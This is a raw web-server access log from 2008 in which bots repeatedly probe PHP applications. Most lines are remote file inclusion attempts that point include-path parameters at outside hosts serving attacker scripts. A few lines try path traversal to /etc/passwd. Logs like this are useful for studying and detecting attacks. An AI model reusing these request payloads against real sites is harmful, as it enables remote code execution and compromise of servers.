72.15.196.106 - - [16/Jan/2008:12:02:46 -0800] "GET /logs/access_071225.log/modifyform.html?code=http://bazar.lancut.org/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:12:04:14 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:12:04:15 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:12:04:15 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.113.233.230 - - [16/Jan/2008:12:04:54 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:12:06:22 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://proscripting.altervista.org/xpl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [16/Jan/2008:12:06:45 -0800] "GET /logs/access_071220.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [16/Jan/2008:12:06:51 -0800] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [16/Jan/2008:12:06:56 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.35.179 - - [16/Jan/2008:12:07:43 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
213.80.123.56 - - [16/Jan/2008:12:10:14 -0800] "GET /logs/access_071220.log//[flat_php_board_path]index.php?a=viewprofile&username=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [16/Jan/2008:12:10:15 -0800] "GET /logs//[flat_php_board_path]index.php?a=viewprofile&username=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [16/Jan/2008:12:10:21 -0800] "GET /logs/access_071219.log//[flat_php_board_path]index.php?a=viewprofile&username=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:12:11:23 -0800] "GET /logs/access_071222.log/index.php?sub=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.150.206 - - [16/Jan/2008:12:18:34 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.150.206 - - [16/Jan/2008:12:18:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.150.206 - - [16/Jan/2008:12:18:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.164.133.203 - - [16/Jan/2008:12:21:42 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.164.133.203 - - [16/Jan/2008:12:21:42 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:12:21:46 -0800] "GET /logs/access_071222.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:12:21:46 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:12:21:47 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:12:21:57 -0800] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:12:21:57 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.201.206 - - [16/Jan/2008:12:21:57 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://manxdate.com/id_img/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:12:22:42 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:12:22:42 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
65.38.105.135 - - [16/Jan/2008:12:23:23 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.174.238 - - [16/Jan/2008:12:23:41 -0800] "GET /index.php?seite=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
81.169.174.238 - - [16/Jan/2008:12:23:42 -0800] "GET /logs/index.php?seite=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:12:26:22 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:12:26:22 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:12:26:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.199.66 - - [16/Jan/2008:12:26:56 -0800] "GET /logs/access_071225.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosconfig_absolute_path=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [16/Jan/2008:12:27:42 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.1" 200 849 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
222.237.76.146 - - [16/Jan/2008:12:27:43 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:28:36 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:28:36 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:28:37 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:28:37 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:43 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:43 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:43 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:43 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:43 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:43 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:54 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:55 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:55 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:55 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:55 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:32:55 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [16/Jan/2008:12:34:48 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.64.215 - - [16/Jan/2008:12:36:53 -0800] "GET /logs/access_071126.log//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.64.215 - - [16/Jan/2008:12:36:53 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [16/Jan/2008:12:36:53 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.64.215 - - [16/Jan/2008:12:36:53 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [16/Jan/2008:12:36:54 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [16/Jan/2008:12:36:55 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.210.51 - - [16/Jan/2008:12:37:01 -0800] "GET /logs/access_071225.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/derf/rfi.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:01 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:01 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:01 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:12:38:13 -0800] "GET /logs/access_071221.log//convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:12:38:13 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:12:38:14 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:18 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:18 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:18 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.111.64.215 - - [16/Jan/2008:12:38:35 -0800] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.111.64.215 - - [16/Jan/2008:12:38:35 -0800] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:36 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:36 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:36 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://temptingsweets.net//admin/images/graphs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:37 -0800] "GET /logs/access_071225.log///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:37 -0800] "GET ///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.74.171.125 - - [16/Jan/2008:12:38:37 -0800] "GET /logs///templates/mangobery/footer.sample.php?Site_Path=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:12:40:16 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:12:40:16 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:12:40:16 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [16/Jan/2008:12:42:40 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.sjbo.net//admin/backup/idasc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.156.105.11 - - [16/Jan/2008:12:43:23 -0800] "GET /logs/access_071224.log//convert/mvcw.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.164.133.203 - - [16/Jan/2008:12:43:36 -0800] "GET /logs/access_071229.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [16/Jan/2008:12:43:43 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [16/Jan/2008:12:45:11 -0800] "GET /logs/access_071229.log/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [16/Jan/2008:12:45:11 -0800] "GET /modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [16/Jan/2008:12:45:12 -0800] "GET /logs/modules/vwar/convert/mvcw.php?step=1&vwar_root=http://www.vennom.xpg.com.br/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:45:59 -0800] "GET /config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:46:01 -0800] "GET /logs/access_071230.log///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:46:01 -0800] "GET ///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:46:01 -0800] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:12:47:11 -0800] "GET /logs/access_071214.log/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:12:47:12 -0800] "GET /inc/cmses/aedating4CMS.php?dir[inc]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:12:47:12 -0800] "GET /logs/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [16/Jan/2008:12:47:43 -0800] "GET /logs/access_071219.log/inc/cmses/aedating4CMS.php?dir[inc]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:48:00 -0800] "GET /logs/access_071231.log/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:48:00 -0800] "GET /config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:48:00 -0800] "GET /logs/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:48:04 -0800] "GET //inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:54 -0800] "GET /logs/access_071230.log///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:54 -0800] "GET /logs/access_071230.log///squirrelcart/cart_content.php?cart_isp_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:54 -0800] "GET ///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:54 -0800] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:54 -0800] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:54 -0800] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.workinghome2004.com//chat/inc/langs/bd.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:58 -0800] "GET /logs/access_071230.log///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:58 -0800] "GET ///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.178.128.116 - - [16/Jan/2008:12:49:58 -0800] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:51:46 -0800] "GET /logs/access_071231.log//inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:51:46 -0800] "GET //inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.19.68 - - [16/Jan/2008:12:51:46 -0800] "GET /logs//inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.lindori.de//AdvancedGuestBook/.r/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [16/Jan/2008:12:55:22 -0800] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.38.105.135 - - [16/Jan/2008:12:55:22 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.142.34 - - [16/Jan/2008:12:55:35 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
